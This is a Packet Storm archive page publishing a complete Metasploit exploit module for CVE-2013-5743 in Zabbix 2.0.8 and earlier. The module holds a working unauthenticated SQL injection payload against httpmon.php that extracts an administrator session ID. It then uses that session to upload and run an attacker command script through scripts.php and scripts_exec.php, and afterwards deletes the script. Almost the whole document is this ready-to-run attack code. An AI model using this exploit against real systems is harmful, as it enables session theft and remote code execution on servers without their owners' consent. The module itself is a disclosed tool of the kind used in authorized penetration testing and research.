seeing is believing

Zabbix 2.0.8 SQL Injection / Remote Code Execution

Zabbix 2.0.8 SQL Injection / Remote Code Execution
Posted Oct 14, 2013
Authored by Jason Kratzer, Lincoln | Site metasploit.com

This Metasploit module exploits an unauthenticated SQL injection vulnerability affecting Zabbix versions 2.0.8 and lower. The SQL injection issue can be abused in order to retrieve an active session ID. If an administrator level user is identified, remote code execution can be gained by uploading and executing remote scripts via the 'scripts_exec.php' file.

tags | exploit, remote, php, code execution, sql injection
advisories | CVE-2013-5743
MD5 | 98f252fc2c529733cadab92811ca1757

Zabbix 2.0.8 SQL Injection / Remote Code Execution

Change Mirror Download
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking

include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::FileDropper

def initialize(info={})
super(update_info(info,
'Name' => "Zabbix 2.0.8 SQL Injection and Remote Code Execution",
'Description' => %q{
This module exploits an unauthenticated SQL injection vulnerability affecting Zabbix
versions 2.0.8 and lower. The SQL injection issue can be abused in order to retrieve an
active session ID. If an administrator level user is identified, remote code execution
can be gained by uploading and executing remote scripts via the 'scripts_exec.php' file.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Lincoln <Lincoln[at]corelan.be>', # Discovery, Original Proof of Concept
'Jason Kratzer <pyoor[at]corelan.be>' # Metasploit Module
],
'References' =>
[
['CVE', '2013-5743'],
['URL', 'https://support.zabbix.com/browse/ZBX-7091']
],
'Platform' => ['unix'],
'Arch' => ARCH_CMD,
'Targets' =>
[
['Zabbix version <= 2.0.8', {}]
],
'Privileged' => false,
'Payload' =>
{
'Space' => 255,
'DisableNops' => true,
'Compat' =>
{
'PayloadType' => 'cmd',
'RequiredCmd' => 'generic perl python'
}
},
'DisclosureDate' => "Sep 23 2013",
'DefaultTarget' => 0))

register_options(
[
OptString.new('TARGETURI', [true, 'The URI of the vulnerable Zabbix instance', '/zabbix'])
], self.class)
end

def uri
return target_uri.path
end

def check
# Check version
print_status("#{peer} - Trying to detect installed version")

res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(uri, "httpmon.php")
})

if res and res.code == 200 and res.body =~ /(STATUS OF WEB MONITORING)/ and res.body =~ /(?<=Zabbix )(.*)(?= Copyright)/
version = $1
print_status("#{peer} - Zabbix version #{version} detected")
else
# If this fails, guest access may not be enabled
print_status("#{peer} - Unable to access httpmon.php")
return Exploit::CheckCode::Unknown
end

if version and version <= "2.0.8"
return Exploit::CheckCode::Appears
else
return Exploit::CheckCode::Safe
end
end

def get_session_id
# Generate random string and convert to hex
sqlq = rand_text_alpha(8)
sqls = sqlq.each_byte.map { |b| b.to_s(16) }.join
sqli = "2 AND (SELECT 1 FROM(SELECT COUNT(*),CONCAT(0x#{sqls},(SELECT MID((IFNULL(CAST"
sqli << "(sessionid AS CHAR),0x20)),1,50) FROM zabbix.sessions WHERE status=0 and userid=1 "
sqli << "LIMIT 0,1),0x#{sqls},FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)"

# Extract session id from database
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri("#{uri}", "httpmon.php"),
'vars_get' => {
"applications" => sqli
}
})

if res && res.code == 200 and res.body =~ /(?<=#{sqlq})(.*)(?=#{sqlq})/
session = $1
print_status("#{peer} - Extracted session cookie - [ #{session} ]")
return session
else
fail_with(Failure::Unknown, "#{peer} - Unable to extract a valid session")
end
end

def exploit
# Retrieve valid session id
@session = get_session_id
@sid = "#{@session[16..-1]}"
script_name = rand_text_alpha(8)
# Upload script
print_status("#{peer} - Attempting to inject payload")
res = send_request_cgi({
'method' => 'POST',
'cookie' => "zbx_sessionid=#{@session}",
'uri' => normalize_uri(uri, "scripts.php"),
'vars_post' => {
'sid' => @sid,
'form' => 'Create+script',
'name' => script_name,
'type' => '0',
'execute_on' => '1',
'command' => payload.encoded,
'commandipmi' => '',
'description' => '',
'usrgrpid' => '0',
'groupid' => '0',
'access' => '2',
'save' => 'Save'
}
})

if res and res.code == 200 and res.body =~ /(Script added)/
print_status("#{peer} - Payload injected successfully")
else
fail_with(Failure::Unknown, "#{peer} - Payload injection failed!")
end

# Extract 'scriptid' value
@scriptid = /(?<=scriptid=)(\d+)(?=&sid=#{@sid}">#{script_name})/.match(res.body)

# Trigger Payload
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri("#{uri}", "scripts_exec.php"),
'cookie' => "zbx_sessionid=#{@session}",
'vars_get' => {
"execute" =>1,
"scriptid" => @scriptid,
"sid" => @sid,
"hostid" => "10084"
}
})
end

def cleanup
post_data = "sid=#{@sid}&form_refresh=1&scripts[#{@scriptid}]=#{@scriptid}&go=delete&goButton=Go (1)"
print_status("#{peer} - Cleaning script remnants")
res = send_request_cgi({
'method' => 'POST',
'data' => post_data,
'cookie' => "zbx_sessionid=#{@session}",
'uri' => normalize_uri(uri, "scripts.php")
})

if res and res.code == 200 and res.body =~ /(Script deleted)/
print_status("#{peer} - Script removed successfully")
else
print_warning("#{peer} - Unable to remove script #{@scriptid}")
end
end
end

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

February 2015

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Feb 1st
    2 Files
  • 2
    Feb 2nd
    17 Files
  • 3
    Feb 3rd
    15 Files
  • 4
    Feb 4th
    16 Files
  • 5
    Feb 5th
    14 Files
  • 6
    Feb 6th
    4 Files
  • 7
    Feb 7th
    0 Files
  • 8
    Feb 8th
    0 Files
  • 9
    Feb 9th
    0 Files
  • 10
    Feb 10th
    0 Files
  • 11
    Feb 11th
    0 Files
  • 12
    Feb 12th
    0 Files
  • 13
    Feb 13th
    0 Files
  • 14
    Feb 14th
    0 Files
  • 15
    Feb 15th
    0 Files
  • 16
    Feb 16th
    0 Files
  • 17
    Feb 17th
    0 Files
  • 18
    Feb 18th
    0 Files
  • 19
    Feb 19th
    0 Files
  • 20
    Feb 20th
    0 Files
  • 21
    Feb 21st
    0 Files
  • 22
    Feb 22nd
    0 Files
  • 23
    Feb 23rd
    0 Files
  • 24
    Feb 24th
    0 Files
  • 25
    Feb 25th
    0 Files
  • 26
    Feb 26th
    0 Files
  • 27
    Feb 27th
    0 Files
  • 28
    Feb 28th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2015 Packet Storm. All rights reserved.

close